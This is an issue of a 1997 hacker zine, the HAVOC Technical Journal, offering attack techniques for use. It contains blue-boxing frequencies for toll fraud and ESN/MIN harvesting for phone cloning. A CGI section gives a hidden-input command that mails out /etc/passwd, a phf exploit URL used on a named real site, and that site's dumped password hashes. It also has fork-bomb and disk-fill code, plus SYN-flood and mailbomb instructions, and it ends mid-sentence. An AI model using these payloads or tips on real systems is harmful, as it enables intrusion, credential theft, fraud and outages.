home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / zines / n_z / thtj8.txt < prev    next >
Encoding:
Text File  |  2003-06-11  |  64.5 KB  |  1,841 lines

  1. ╒══════════════════════════════════════════════════════════════════╕
  2. │The HAVOC Technical Journal                                       │▒
  3. └──────────────────────────────────────────────────────────────────┘▒
  4.  ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
  5.  
  6. Vol. 1 | No.8 | March 1st, 1997 | A HAVOC Bell Systems Publication
  7.                 HBS: "we're ereet"    
  8. _____________________________________________________________________________
  9. Inside this issue:
  10.  
  11.        Whats new this issue..............................
  12.        Editorial.........................................Scud-O
  13.        Blue Boxing in France Pt. II......................memor
  14.        Fiber Optics......................................Keystroke
  15.        evilempire.org....................................Scud-O
  16.        Snarfing..........................................FuScAT 
  17.        CGI Insecurities Part III.........................Scud-O
  18.        Denial Of Service Attacks.........................Scud-O
  19.        The 'g0d' Project.................................Scud-O
  20.        RTFM: UNIX Basics.................................
  21.        HBS...............................................    
  22.        Next Month........................................      
  23.  
  24.       ----------------------------------------------------
  25.       evilempire.org - the future of hbs - comming soon!
  26.       ----------------------------------------------------
  27. ___________________________________________________________________
  28.  
  29.                     Editorial by Scud-O
  30.  
  31.        First off, I want to apologize for the poor quality of issue 7.
  32. I was worried that it would not be 100k, so I added some crap, and I know
  33. that I shouldn't have. This is NOT what you have or should come to expect from 
  34. HBS and The HAVOC Technical Journal in particular.
  35.        Anyway, next month KungFuFox is going to guest edit, and Keystroke and
  36. disc0re will help him collect articles and distribute them. I am going to
  37. be ram-rodding thtj down everyone's throat, and getting more and more people 
  38. to read thtj.
  39.        This break will from editing will allow me to get back on track with 
  40. school, and focus more so that I can write better articles. Issue 8 has gone 
  41. fairly well, I am proud of it, and I think it is one of our greatest yet. 
  42. However, only a few people contributed to it, so I have worked extra hard on 
  43. my articles, especially the Denial Of Service article, which I feel is 
  44. probably the best writing I've done so far. So read it and tell me what you 
  45. think. This issue may even tie or beat issue 6 as our best issue ever.
  46.        I'll be getting the web page fixed up, adding the files page, 
  47. getting linux installed on my computer again, getting the ISP ready, raising 
  48. funds for the ISP, getting my ICMP project done, and getting HBScript aka mIRC 
  49. HAVOC Bell Systems version 1.0 done. Hopefully somewhere in there I'll still
  50. have time for a life and fun. geez... just saying it all makes me tired....
  51.  
  52.     ----------------------------------------------
  53.   /       ---/   --/  /   /  |  /------/   /    /
  54.  /---       /-----/------/-----/      /   /    /
  55. /----------/ -of HAVOC Bell Systems- /--------/
  56.             "The eLiTe lammah!"
  57.  
  58. FoxMulder@worldnet.att.net | http://www.geocities.com/SiliconValley/8805
  59.  
  60.  "You're Spiro Agnew and I'm the Dick you answer to."
  61.              - 'Boom' , Bloodhound Gang with Rob Van Winkle
  62. ___________________________________________________________________
  63.  
  64.                 French Phreaking & Blueboxing. By memor
  65.  
  66. 1.1 *** French Phreakers Politics.
  67.         1.11 Teletel Network In France.    
  68.         1.12 Warez Business & Phreaking.
  69. 1.2 *** Type Of Phone Numbers In France.
  70.         1.21 Local & National Highly Dangerous # Numbers.
  71.         1.22 0800 Dangerous Free # Numbers.
  72.         1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers.
  73.         1.24 1800 & Operators # Numbers.
  74.  
  75. I  ---  French Phreaking & Blueboxing.
  76.  
  77.     1.1 *** French Phreakers Politics.
  78.  
  79. French phreaking scene is mostly using lame Calling Card (was using it 
  80. because now with the Cartes Pastelles (pastels cards)) , calling card
  81. made by France Telecom it is hardest to fraud (361010) and law are now
  82. really bad with Carders.. Credit or Calling. Blueboxing dude are not
  83. searched by cops and/or France Telecom so that make us having some little
  84. skills in Blueboxing.
  85.  
  86.     1.11 Teletel Network In France.    
  87.  
  88. Well first Use of bluebox was to come on the Teletel Network (explained
  89. in bif.txt) that 3615 network is really expensive and slow (1200bds-v23)
  90. so we had (when we were young) to use bluebox for connecting it and 
  91. staying on really long times (like how we are doing on irc now) , personnaly
  92. i used that for connecting 3615 RTEL , a server which was talking about
  93. computers, cracking and computers selling.
  94.  
  95. note: nua of RTEL is 020803506031801
  96.             France____]\/[__________Server RTEL.
  97.  city nammed rennes________|    
  98.  
  99. Rtel is still alive, it uses videotex terminals (you can get it on
  100. ftp.minitel.fr or ftp.ibp.fr) , and you must have a modem which knows
  101. v23 (for USR sportster v23 is ATS34=8 ATZ)
  102.  
  103.        1.12 Warez Business & Phreaking.
  104.  
  105. The paradox team (France) was using calling card for accessing somes BBS in
  106. usa and downloading Super Ninterdo Games, PC and Amiga Warez.. but their
  107. calling cards died, so they fastly learnt bluebox for making their business
  108. living again.. they were bluboxin to usa for dlding games and selling it in
  109. France.. they all got busted.
  110.  
  111.     1.2 *** Type Of Phone Numbers In France.
  112.  
  113.        1.21 Local & National Highly Dangerous # Numbers.
  114.  
  115. The local phone numbers, numbers that u must pay at the connection opening
  116. (0.73FF ... 5$US=1FF) and after u have to pay a taxe/min like 0.23FF/min
  117. so that phone are not really interesting for blueboxing because u still
  118. pay something.. well maybe interesting for calling an another country
  119. but for calling somewhere in france, thats not interesting at all, National
  120. Phone numbers are same (0.73FF at connection opening) but after , you pay 
  121. more.
  122. Well.. you want to bluebox on that phone number, ok you are a good phreaker,
  123. you scan and u pass all the filters of the french system.. you find 
  124. frequencies like:
  125.  
  126.  Freq1 : voice1:2700 voice2:2650 lenght:130ms delay:10ms
  127.  Freq2 : voice1:2570 voice2:2430 lenght:300ms delay:10ms
  128.  
  129. After , you redial in France for calling that hospital :
  130.  
  131.  Dial_Seq:A0380293031C
  132.     local_]\/[___________________________Hospital Number of dijon
  133.          For calling Provence  
  134.  
  135. Now france is divided in parts like
  136.  
  137.     A01 <- Paris
  138.     A02 <- Province (East of France)
  139.     A03 <- South Of France / Province
  140.  
  141. Well you can call another country via or Routine Code
  142.  
  143.  Dial_Seq:A001(USA PHONE NUMBER)C
  144.       A00 is for calling a foreign country
  145.  
  146.  or via Dial_Seq:B01(USA PHONE NUMBER)C
  147.         B for an international call.
  148.  
  149.  But well if a company or someone you bluebox on ask France Telecom 
  150.  about a fraud, France telecom uses for his local/national phone numbers
  151.  a big loging (1 month loging for each phone number) which is written
  152.  
  153.  Who Call <-> Who is Called <-> Lenght <-> Date     / Times
  154.  11111111  -  222222222      -  3Hours  -  25/12/96 / 00:00
  155.  22222222  -  B01xblahxC     -  2H59Mn  -  25/12/96 / 00:01  
  156.  
  157.  11111111 is you so u can be located.. be careful.. numbers really
  158.  dangerous.
  159.    
  160.         1.22 0800 Dangerous Free # Numbers.
  161.  
  162.  0800 numbers are free phone numbers in france , same method for blueboxin
  163.  on like France local/national phone numbers , but same danger.
  164.  
  165.         1.23 080090xxxx & 080091xxxx Free BlueBoxing # Numbers.
  166.  
  167.  
  168.  That ones are more more interesting, because they are free phone numbers
  169.  but for calling anothers countries.. like calling KornFlex(USA) from
  170.  a 080090xxxx , with that ones, you can call... most of the countries like
  171.  Perou, Chili, USA, Canada(0800908026), UK, DE ,...
  172.  Well you can bluebox on it , but you must know the frequencies of the 
  173.  countrie.
  174.  like for coloumbia:
  175.  
  176.  Freq1:2600 Freq2:2550 lenght:150ms delay:10ms
  177.  Freq1:2400 Freq2:2350 lenght:300ms delay:10ms
  178.  
  179.  dial in CCITT#5 ...
  180.  coloumbia in not really interesting , because you can only phone in local
  181.  coloumbia ... BxxxxC will sux... only AxxxxxC works if you dont try to
  182.  use a routine code, it will hang up to busy if you try that.
  183.  No logs on that numbers.
  184.  
  185.         1.24 1800 & Operators # Numbers.
  186.  
  187.  1800 numbers are free for calling foreign countries operators but i know
  188.  it is not logged , so its "safe" to blueboxe on it, i know some person which
  189.  do that (Dominicana Republic) from their home,We scanned Chili with 
  190.  a friend at home, well the sure thing is that we are not busted and we did
  191.  that 1 month ago. Dominicana Republic died 5-6 months ago.
  192.  
  193.     Now some numbers for Calling France Direct (A french operator)
  194. for free from your countries:
  195.  
  196. Argentina  0033800999111              Australia  1800881330, 180055144(ccs)
  197. Austria    022903033                  Belgium    080010033, 080010330
  198. Brasil     0008033                    Canada     18003634033, 18004636226(ccs)
  199. Chili      123003331                  China      10833(big cities only)  
  200. Colombia(1)980330057                  Colombia(2)980330010(ccs)
  201. Korea      0090330, 003933            Denmark    80010033
  202. Dom.Rep    18007510600                EAU        8001133
  203. Finland    980010330                  Gabon      00033                   
  204. Germany    0130800033                 Greece     008003311
  205. Hawaii     18008653313                HK         8000033, 80003311(ccs)
  206. Hungary    0080003311                 Iceland    8009033
  207. Indonesia  001801331                  Ireland    1800551033, 1800550033(ccs)         
  208. Israel     1773302727                 Italy      1720033
  209. Japan(1)   0039331, 0031005533(ccs)   Japan(2)   004422333333(ccs)          
  210. Lux.       08000033(ccs)              Malaysia   8000033(ccs)               
  211. Morocco    002110033                  M.i.       73331                   
  212. Mexico     98800332001                Norway     80019933                
  213. New-Cal.   000933                     New-Zel.   000933                  
  214. UK(1)      0800890033                 UK(2)      0500890033(ccs)
  215. Spain      900990033                  Sweden(1)  020799033                  
  216. Sweden(2)  020799133(ccs)             Uruguay    000433
  217. USA(1)     18005372623, 18009372623   
  218. USA(2)     180047372623(ccs), 18008727835(ccs)
  219. USA(3)     18007278350(ccs), 18002510841(ccs)
  220.  
  221. ___________________________________________________________________
  222.  
  223.                     Fiber Optics by Keystroke
  224.  
  225. I explained the first main fiber optic project in my last article for HAVOC
  226. (the TAT-8). Here, I will try to give you a brief overview of fiber optic
  227. communications.
  228.  
  229. Fiber Optics Communications
  230.  
  231. Fiber Optics Communications or lightwave communications
  232.  
  233. A typical fiber optics communications system consists of three basic
  234. components:
  235.  
  236. 1. Optical Transmitter
  237. 2. Optical fiber
  238. 3. Optical Receiver
  239. 4. Havoc (Optional)
  240.  
  241. The transmission of information over a distance using optical fiber usually
  242. requires several steps. First, the the info is converted into an electrical
  243. signal (if it is not already in that form). Second, the electrical signal is
  244. changed into an optical signal w/ the help of an optical source. Third, the
  245. optical signal is transmitted through the optical fiber. Fourth, the optical
  246. signal is detected and converted into an electrical signal with the help of
  247. an optical detector. Finally, the signal processing is done.
  248.  
  249. Below are some more specific optical fibers, recivers, etc
  250.  
  251. Electrical Interface - Electrical Modulator, encoder, multiplexer, etc.
  252.                    Optical transmitter - Led, laser diode optical fiber
  253. - Monomode step index fiber, multimode step-index fiber,
  254.                    multimode graded index fiber
  255.  
  256. Optical receiver - pin diode, apd, photo transistor, photo darlinton
  257.                 electrical interface - electrical demodulator, decoder,
  258.                 demultiplexer, etc.
  259.  
  260. Theoretically, an optical signal with a wavelength of 1 micrometer, a
  261. bandwidth of 300 THz is possible. Presently, the maxium bandwidth is only
  262. 10 Gbps :p Monomode step index is best for long haul projects (less
  263. transmission loss) while multimode is better for short haul (more loss, but
  264. also more speed)
  265.  
  266. There are 3 types of optical fiber: Monomode step index fiber, multimode
  267. step-index fiber, and multimode graded index fiber.
  268.  
  269. There are many benifits of fiber optic communication:
  270.  
  271. Large Bandwidth (explained above)
  272.  
  273. Small size and weight (tens of micrometers smaller than the diameter of a
  274. human hair and MUCH smaller and lighter than copper (sic) cables)
  275.  
  276. Dielectric construction - No ground lops are required (no external
  277. electromagnetic fields)
  278.  
  279. Low transmission loss - (monomode fibers loose .2 db/km multimode 1db/kb -
  280. not many repeaters necessary)
  281.  
  282. EMI & RFI immunity - No cross talk because there is no generation of
  283. electrical or electromagnetical noise or interfierence
  284.  
  285. Signal security - Optical fibers do not radiate energy. Can't be tapped in a
  286. non-intrusive manner. (Military and banks use them)
  287.  
  288. High reliability and durability - cant corrode - cant oxidize - can be used
  289. in explosive or nuclear enviroment
  290.  
  291. Now to compare optical sources
  292.  
  293.             LED       vs.       Laser Diode
  294. Spectral width      Large 30-40 nm           Narrow 1 - 2 nm
  295. Modulation bandwidth     1 Gbps                   6 -10 Gbps
  296. Insertion loss      10 -15 db           3 db
  297. Output power        1 -5 mW                  5 - 15 mW
  298. Life expectancy          100 million hours             1 million hours
  299. Temperature Sensiviaty   Tolerant                 Sensitive
  300. Beam divergence          Large                    Narrow
  301. Cost           Low                 High
  302.  
  303. Optical Detectors
  304.  
  305.         PIN (P-type Intrinsic, N-type)     APD
  306. Sensitivity    Low                 High
  307. Cost      Low                 High
  308. Temp. Sensitiv.     Tolerant                 Sensitive
  309. Bias Voltage   Low (10-50 V)            High (100-300 V)
  310.  
  311.  
  312. As you can see, fiber optic communication is far superior to what is in use
  313. today in the majority of the world (copper wire).
  314.  
  315. - Keystroke
  316.  
  317. ___________________________________________________________________
  318.                         
  319.                         evilempire.org
  320.                         --------------
  321. evilempire.org login
  322. HBS Unix 5.0 -=- linux kernel 1.3.20
  323. User:
  324. Password:
  325. -------------------------------------
  326.  
  327.    Imagine........
  328.  
  329.        evilempire.org is to be the future of HBS, our up and coming ISP.
  330. We are currently filing for the domain with InterNIC, and plan for Defraz to
  331. run a simple vdomain for us until we get minos ( the ISP computer) built.
  332. evilempire.org will start up with at least 2gb of space or so, and we will
  333. expand as we need to, and as funds allow. we plan for the computer to be
  334. co-located ( basically this means at an ISP's building, with a t1 connection)
  335. but with a modem and a line to for my internet access, and possibly psych0's
  336. if he pays me. We will be offering accounts for a low fee, which will help us
  337. cover the cost of start up ( hopefully about only 1000$) and the monthly cost
  338. of start up ( about 300$ a month). As we get more and more users, accounts
  339. will get cheaper, as we will only be usng the money to pay for the monthly
  340. fees and the costs to upgrade hardware, etc.
  341.  
  342.        When we start, we will have 1gb of space for users, since about 1gb
  343. will be used for linux and misc software, FTP files, newsgroups, etc. However,
  344. if we can piggy back off of the ISP that will run us, we may use their
  345. newsgroups and then offer more space to users.
  346.  
  347.        We currently need at least 30 users to make this happen, so i am
  348. offering the following, The first 35 to 40 people that sign up, i will give
  349. you slashed prices on accounts when i have more people using the service, and
  350. will make your accounts free if i make enough to cover for your accounts.
  351.  
  352.        And, as i gain users, i will start to offer different accounts if
  353. people say, only want to run a bot or two on the account, i will lower the
  354. price.
  355.  
  356.        As of 3-3-97 Our pricing plan:
  357.        ----------------------------------------------------
  358.        $5/mo                   email + newsgroups
  359.        $10/mo                  full shell
  360.        $15/mo                  secured shell *
  361.  
  362.        $5/mo                   bot account only
  363.  
  364.        $10/yr                  for each 10mb after the quota limit
  365.        $15/yr                  FTP account **
  366.  
  367.  
  368.        * a secured account will offer more leanancy if you use the server
  369.        to run attacks on servers, etc. However, we WILL suspend your account
  370.        if you abuse IRC and i get e-mails that if you do not stop, they will
  371.        ban our domain. I AM NOT going to get evilempire.org banned from every
  372.        IRC server out there!!!
  373.  
  374.        ** The FTP accounts will assure that you can get the files you need,
  375.        since we plan to have a LARGE file collection, but only about 5
  376.        anonymous FTP's at a time. All shell accounts come with this.
  377.  
  378.        All shells come with: CGI-BIN, all UNIX stuff, many IRC progs,
  379.        tons of DOS attackers, FTP access, mailbombers, allowed to run bots,
  380.        and about 20-50+ mb of space!
  381.        -------------------------------------------------------------------
  382.  
  383. We plan to get the server up be June or July, so send in the money soon if you
  384. want a premium account! E-mail me at: FoxMulder@worldnet.att.net for more
  385. information, and since our PO Box is not up yet.
  386.  
  387.              evilempire.org
  388.              PO Box XXXX
  389.              Sykesville, MD 21784
  390.  
  391.              heh
  392.  
  393. computers:
  394.  
  395. limbo: (current computer)
  396.        486/66 ( was a 50, pushed to 66)
  397.        8 mb ram
  398.        245 md ide hd
  399.        1 gb scsi hd
  400.        2x cd-rom
  401.        28.8 modem
  402.  
  403. minos: ( future computer at co-location)
  404.        486/100
  405.        16mb ram
  406.        2 gb ide hd
  407.        probably no cd drive
  408.        28.8 modem (maybe)
  409.        10mbps ethernet card
  410.        connected to t1 line
  411.  
  412. lucifer(?) ( future computer at my house)
  413.        pentimum 200 (mmx?)
  414.        32-64mb ram
  415.        2-9gb hd ( ide or scsi)
  416.        8x-12x cd-rom
  417.        28.8 modem
  418.        10mbps ethernet (and another for limbo)
  419.  
  420. ( after the site us up and we have money, we will uprade to probably a
  421. pentium 200 Pro or so, with 64-128 mb ram, several gigs hd, SCSI to support
  422. the hard drives, etc. Then maybe some day i will get a t1 right into the
  423. server and run ti at my house! (not likely) )
  424.  
  425. ___________________________________________________________________
  426.      
  427.  
  428.                     Gettin the Digits by FuScAT
  429.  
  430. (*** ed note: although this article does not go as indepth as i had hoped, it
  431. none the less give you a good over view of 'snarfing' ***)
  432.  
  433.  
  434. Basically we are dealing with the concern of obtaining  Electronic Serial Numbers (ESNÆs) 
  435. and Mobile Identification Numbers (MINÆs) for reprogramming cellular fones. Really 
  436. there are about three basic ways to go about doing this that I am currently aware of. If you Know of any other please let me know about them.
  437.  
  438.  
  439. First: 
  440. Social Engineering 
  441.        You could call up your cell provider and ask for a service man to come
  442. take a look at your fone. They will give you a name and say he will be there
  443. shortly. Then about 10 minutes later call the provider back pretending to be
  444. the service man they just sent out, and with the proper jargon and know how
  445. you can squeeze the info out of them. Really not very affective and frankly
  446. probably more of a waste of time...
  447.  
  448. Second: 
  449. A CellScope 
  450.        Its a fairly simple few pieces of hardware and software consisting of
  451. a cellfone, a palmtop pc(or laptop), the proper software, and an antenna.
  452. Basically the cellfone is used to scan the channels and frequencies of the
  453. cell sites, when a number in use is displayed on the screen from the software
  454. you can lock in on it and the warez will snag the ESN & MIN for you leaving it
  455. in plain english for you to use..VERY PRACTICAL but highly unaffordable.
  456. (unfortunately cus Im sure we would ALL love to have one), and oh yea only
  457. usable by law enforcement agencies or private detectives...(grin) 
  458.  
  459. Finally 
  460. Modified Scanner 
  461.        There is a way to modify a handheld police scanner to do virtually the
  462. same thing the CellScopeÆs cellfone does. You can make a few (quiet a few)
  463. modifications to your scanner to make it scan the cellular frequencies. Now
  464. you will also need the hardware for this, being the connector cable you will
  465. need to connect your scanner to your pc or laptop. Then with the the right
  466. software and the know how you will be able to snag ESNÆs & MINÆs 
  467.  
  468. If I am mistaken in any way PLEASE correct me...and if anyone knows of other
  469. ways to get the digits please let us know... 
  470.  
  471.     --FuScAT
  472.  
  473. ___________________________________________________________________
  474.  
  475.        CGI Insecurities Part III.........................Scud-O
  476.  
  477. ----------------
  478. NOTE:  HBS brings it to you first! We started on CGI weaknesses in October,
  479. phrack brought CGI weaknesses in December! (sorry, just had to gloat a
  480. little!)
  481. ----------------
  482.  
  483.        Well, this is the final chapter in my three part series of CGI
  484. Insecurities, and this will probably be the most useful parts of the whole
  485. series, since you can use these holes in scripts that are out there running.
  486.  
  487. This part of the article covers many topics, but it also focuses mostly on
  488. shell escapes. Many cgi ( especially perl scripts) use calls to unix commands
  489. (mostly sendmail or mail) to get simple serivces done.
  490.  
  491. Shell escapes:
  492.        Many, many,many CGI scripts are vunerable, since they use mail, or
  493. even sendmail <gasp> (what the hell is wrong with those CGI scripters? dont
  494. they know that sendmail has holes?). Using for example ~ or other shell
  495. escape codes, it is possible to get a shell on the remote systems to cause
  496. heh, HAVOC!
  497.        Sendmail is also a BIG hole here, since sendmail holes can be cracked
  498. and exploited by the CGI program.
  499.  
  500.  
  501. system() :
  502.        Another big weakness is the gold old system call, which i presented in
  503. issue 6 (however that was for c, but the basics are the same). If you find a
  504. system(), or even an exec() call, you can modify the html document by, if
  505. you use nutcrape (im not covering IE, since it is the devil!) by clicking,
  506. view, then document source, then change the CGI to system("command_to_run") ,
  507. (command_to_run of coursing being the comand you want to use) save the file,
  508. relaod nutscrape, and use it. Depending on how the CGI is coded, you might
  509. need to add the sites address here and there, but i will leave that to you.
  510.  
  511. <input> fun:
  512.        Another way to get the password file, is similar to  the file i did
  513. way back in issue 4, but this is a hidden input tag ( normally used to store
  514. information from page to page, much like 'cookies'  do) which sends you an
  515. email with the passwords.
  516.  
  517. ex:
  518.        <input type="hidden" name="mail_to"
  519.        value="info@site.com; mail you@your-isp.com < /etc/passwd">
  520.  
  521.        This then, sends you the password file.
  522.  
  523. phf:
  524. -----------
  525.        This bug is pretty common knowledge now, but basically, you enter the
  526. following:
  527.  
  528.        http://site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
  529.  
  530.        This then returns to you, a copy of the password file. If you dont
  531.        believe me, that something like that could be so simple, try
  532.        perrier.com . I got this when i tried:
  533.  
  534. --------------------------------------------------------------
  535. <H1>Query Results</H1>
  536. <P>
  537. /usr/local/bin/ph -m  alias=X
  538. /bin/cat /etc/passwd 
  539. <PRE>
  540. root:WnDFHddnKu28M:0:1:system PRIVILEGED account:/:/bin/csh
  541. nobody:*Nologin:65534:65534:anonymous NFS user:/:
  542. nobodyV:*Nologin:60001:60001:anonymous SystemV.4 NFS user:/:
  543. daemon:*:1:1:system background account:/:
  544. bin:*:3:4:system librarian account:/bin:
  545. uucp:Nologin:4:2:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
  546. uucpa:Nologin:4:2:uucp adminstrative account:/usr/lib/uucp:
  547. auth:*:6:11:Authentication Subsystem:/tcb/bin:
  548. cron:*:7:14:Cron Subsystem:/usr/adm/cron:
  549. lp:*:8:12:Line Printer Subsystem:/users/lp:
  550. tcb:*:9:18:Trusted Computing Base:/tcb:
  551. adm:*:10:19:Administration Subsystem:/usr/adm:
  552. ris:Nologin:11:21:Remote Installation Services Account:/usr/adm/ris:/bin/sh
  553. locker:Nologin:12:15:locker:/usr/users/locker:/bin/sh
  554. per-surv:Nologin:204:1:Perrier Survey Email address:/opt/per-surv:/bin/csh
  555. calvert:Nologin:205:1:Calvert Deforest Email address:/opt/calvert:/bin/false
  556. thebrains:Nologin:206:1:jrap Email address:/opt/jrap:/bin/false
  557. jrap-surv:Nologin:207:1:jrap survey addr:/opt/jrap:/bin/csh
  558. footlocker:Nologin:208:1:footlocker survey:/opt/footlocker:/bin/csh
  559. ftp:*:500:25:Anonymous FTP user:/data/web/public/ftp:/bin/false
  560. eds:RbaQ09DoC7MXg:501:26:EDS FTP user:/data/clients/eds:/bin/false
  561. unprod:mD8.fz9LD.Tw6:210:32:unproductions FTP user:/data/web/public/calvert:/bin/false
  562. bardhl:pm59ch9LkeaqY:211:33:Bardahl FTP User:/data/web/public/bardahl:/bin/false
  563. </PRE>
  564. ----------------------------------------------------------------------------
  565.  
  566. Pretty slick no?
  567. Anyway, have fun cracking their passwords.....
  568.  
  569. one last thing....
  570. --------------------------
  571. exploit.pl
  572.        This script while only 4 lines of code, gives you (or who ever runs
  573. this script) a shell to do, well what ever you please.
  574.  
  575. #!/usr/bin/perl
  576. $ENV{PATH}="/bin:/usr/bin";
  577. $>=0;$<=0;
  578. exec("/bin/bash");
  579.  
  580. ----------------------------------
  581.  
  582.     I want to thanks all of you for reading this, and I want to give thanks
  583. for the knowledge of CGI and its weaknesses, and thanks to memor for telling
  584. me to try out phf on perrier.com....
  585.                                 Scud-O
  586. ___________________________________________________________________
  587.  
  588.            [The Modern Guide to Denial of Service Attacks]
  589.                  History and Modern Uses by Scud-O
  590.  
  591.  
  592.        Denial of Service (DOS) Attacks are nothing new. Many old
  593. versions of UNIX would crash with this little bit of code if an
  594. administrator did not see all the processes running.
  595.  
  596.  
  597.        main()
  598.        {
  599.              while(1)
  600.                     fork();
  601.        }
  602.  
  603. I remember crashing a few systems with this little prog, and a system will go
  604. down fast if this is not seen by an admin. Basically this program spawns ( or
  605. forks) another process of it self which then spawns more, and so on. This is a
  606. total attack since  all of the chold processes are waiting for new processes
  607. to be established, so even if you kill one process, another will take its
  608. place.
  609.        However, most current versions of UNIX are immune to this attack since
  610. users are limited to a maximum number of processes (except root). Most UNIX
  611. versions have the max number of processed buitl into the kernel, but Solaris
  612. for example lets the value ( MAXUPROC) be set at boot time, in etc/system
  613. under set maxuproc=100 (or whatever the sysadmin has set it to be). However,
  614. if you have several accounts on a system, or have some friends with accounts,
  615. you all can take down the system by running the program.
  616.        Having too many processes is a great challenge for sysadmins to fix
  617. without having to reboot the system, since:
  618.        a) You can not run ps to determine what process numbers to kill, and
  619.        b) if you are not logged in as super user, yuo cannot use su or login
  620.          because both of these functions require the creation of a process,
  621.          which, if you system is overloaded, is impossible.
  622.  
  623.        However, most sysadmins do not want to shut down their system by just
  624. flicking off the power, since virtually no systems are designed to undergo a
  625. fast, orderly shutdown when quickly powered off. And sysadmins know that
  626. hitting the power is not good for the disk, since it may lose disk blocks, and
  627. it will not flush the buffers to disk, thus losing any unsaved work. So admins
  628. are left to randomly killing processes, or if their system supports it, doing
  629. a kill -TERM -1 , which sends a SIGTERM to all processes except superuser
  630. processes and system processes.
  631. ________________
  632. Disk Attacks:
  633.        Another old method of attack is the old disk attacks, such as filling
  634. up the hard disk, or tree-structures, bot presented below.
  635.  
  636.        Hidden Space:
  637.              This is a form of attack that will work very well as long as
  638. the computer it is on is run 24 hours a day. Basically the sample bit of code
  639. below creates and keeps a file open, thus making it invisible to du or find,
  640. yet  still takeing up space. This is due to the fact that unlinked files are
  641. not in the directory tree, yet they still take up space.
  642.  
  643. filename: fillup.c
  644.  
  645.        #include <stdio.h>
  646.        #include <stdlib.h>
  647.  
  648.        main()
  649.        {
  650.              int ifd;
  651.              chat buf[8192];
  652.              ifd= open("./attack", O_WRITE| O_CREAT, 0777);
  653.              unlink("/.attack");
  654.              while(1)
  655.                     write(ifd,buf, sizeof9buf));
  656.        }
  657.  
  658.        This little program, after creating the file, runs an infinite loop,
  659. which continues to fill up disk space, and stops anything from being worked on
  660. since the disk will be filled up. Try using a ls or du to see the file and it
  661. will not be there, causing the sysadmin some confusion. That is unless they
  662. have a copy of lsof on hand, or they kill the process or all processes. Now
  663. to make this go faster, always run this in the background, and then run a few
  664. more copies just for good measure.
  665.  
  666. * HINT: one way to get this to work faster, is to add a fork() call in the
  667. program, thus making it run multiple copies, and filling up the drive faster.
  668.  
  669. -----------------
  670. Tree-scructure attacks
  671.  
  672.        These are actually quite lame and weak, but they can still cause some
  673. problems, since a tree could be made that is too deep to be deleted by rm.
  674. (HINT: for a very good attack, combine this and the attack up above, to make
  675. a huge directory with huge files!)
  676.  
  677. a sample shell script that makes these directories and fills them up is below:
  678.  
  679.        $!/bin/ksh
  680.        $
  681.        $ Dont try this at home, unless you are quite foolish!
  682.        while mkdir anotherdir
  683.        do
  684.              cd ./anotherdir
  685.              cp /bin/cc fillup
  686.        done
  687.  
  688. On many systems rm- r just cannot delete trees this big, since they can
  689. overflow buffers or limits on the number of filenames or open directories
  690. at one time. using chdir you can delete them manually, but this is quite
  691. boring so most admins would just write a script to do this. (e-mail me if you
  692. need the script)
  693.  
  694. ------------
  695. /tmp
  696.        On many UNIX systems out there today, both users and programs can
  697. create files of unlimited size in the /tmp directory for temporary usage.
  698. Now, you can simply about this vunerability by using the fillup.c or tree
  699. structure progs above and fill up the /tmp dir and conscequentally fill up
  700. the entire disk.
  701.  
  702. ------------------
  703. Network Attacks:
  704. ------------------
  705.        Okay, you are proably saying, hey great, i have these methods to
  706. attack a local system i have an account on, but what about remote systems that
  707. i may not have an account on? well, thanks to daemon9 and other coders out
  708. there, there is an abundancy of remote DOS attacks.
  709.        We are also lucky, to date no firewall really protects from a DOS
  710. attack, but watch that change soon. With all the hype and press about DOS
  711. atacks on ISPs, firewalls will soon be able to  block DOS.
  712.  
  713.        For daemon9's article on TCP/SYN flooding, either
  714.          a) goto http://www.geocities.com/SiliconValley/8805/files.html
  715.             and scroll down to 'phrack' and click on issue 48
  716.          b) goto http://freeside.com/phrack.html and scroll down
  717.             to past issues and get issue 48
  718.          c) or ftp.fc.net/pub/phrack/ and get phrack 48
  719.  
  720.        You will want article 13 which is Project Neptune by daemon9.
  721.        daemon9 gives a great indepth analisys of TCP/SYN flooding and
  722.        offers a great C program to attack systems.
  723.  
  724. Now the basic info on TCP/SYN flooding presented here is nowhere near as
  725. informative as daemon9's since i have not spend as much time on it as he has.
  726. What is below is a very simple explaination of the basic if the flood.
  727.  
  728.        First, we need to see a simple connection. TCP uses a 3 way hand shake
  729. to start up a conversation. ex:
  730.  
  731.              A                       B
  732.                 ---------> SYN
  733.                 <--------- SYN/ACK
  734.                 ---------> ACK
  735.  
  736.        Now if A is the client computer and B is the host, A sends a SYN to
  737. B, and B replies with a SYN/ACK , This tells the client that the server
  738. acknologizes the connection and then the client replies with an ACK, which
  739. says that it acknologizes the connection as well, and the connection is made.
  740.  
  741.        While a SYN is waiting to be processed, it sits in a backlog queue,
  742. waiting for the host to see it. Here is where the flood comes in. Since UNIX
  743. creates a backlog to prevent several SYNs filling up the memory ( which would
  744. make our job so much faster), we must fill up the queue.
  745.  
  746.        If you use a general IP Spoofer, (or the code in phrack 48) you can
  747. use it to make your connection appear to be coming from the spoofed IP, which
  748. MUST be unreachable so it cannot send a RST command. Basically, the client
  749. sends a SYN to the host, the host tries to reply, but it sends it to the
  750. spoofed IP, and since the IP will not respond, it will continue trying to
  751. make a connection, until it times out. So if you run several SYNs to a hosts
  752. port that you want to block, you can quickly fill up the queue, making the
  753. port dead, since it can handle no more connections.
  754.  
  755.        For code that does this, see phrack 48.
  756.  
  757. --------------------
  758. SMTP floods:
  759. --------------------
  760.  
  761.        These are very simple to do, since STMP will pretty much accept just
  762. about anything that comes their way. I did a simple mailbomber in issue 7, so
  763. use that to mailbomb a server, try common accounts like postmaster@site
  764. or info@site, etc, and send the system either several VERY large files to
  765. fill up disk space, or many,many small mails to flood the STMP server with
  766. e-mails, and thus making it unusable.
  767.  
  768. -----------------------------
  769. ICMP_ECHO floods:
  770. -----------------------------
  771.        These attacks are some of the most common, since they are often used
  772. by IRC users to 'kill' other users, and thus many people i know are getting
  773. k-lines and nasty messages from sysadmins who are pissed that someone from
